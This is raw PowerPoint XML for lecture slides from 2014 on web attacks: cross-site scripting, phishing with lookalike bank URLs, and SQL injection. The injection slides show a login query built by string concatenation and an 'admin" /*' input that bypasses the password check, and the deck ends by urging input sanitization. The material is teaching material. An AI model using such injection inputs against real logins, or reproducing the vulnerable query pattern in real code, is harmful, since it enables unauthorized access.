          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1541719513"/>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US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-Site Scripting: General Picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389125" name="Picture 5" descr="malwares_exploit_xss_01"/>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28800" y="1676400"/>
            <a:ext cx="5486400" cy="3471863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389126" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5257800"/>
            <a:ext cx="4038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000">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: http://www.acunetix.com/websitesecurity/xss.htm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="536870503"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obtain information and credential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by masquerading as a trustworthy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>entity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of the top 20 companies targeted by phishing in 2007, 19 are in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>banking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> industry [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IBM]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mostly by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address looks like valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.mybanck.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.mybank.com.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.mybank.com@fakesite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hyperlinked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.antiphishing.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3757115056"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>asks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for a username &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To authenticate the user from the database, the server uses the input data to construct a SQL query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>$query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>user, pw FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>’+$username+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND pw = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>’+$password+’;’’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The query is executed, and if the result is non-null, the user is authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>result </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>run_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($query)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if (result != 0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ok …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600773723"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395266" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normal user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“john”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and pw = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“1234”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SELECT user, pw FROM database WHERE user =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0" smtClean="0"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND pw = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0" smtClean="0"/>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and pw = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whatever”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SELECT user, pw FROM database WHERE user =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>“admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>*” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND pw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>= “whatever”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>admin exists, you can login without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2863340858"/>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Sanitize your database inputs!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
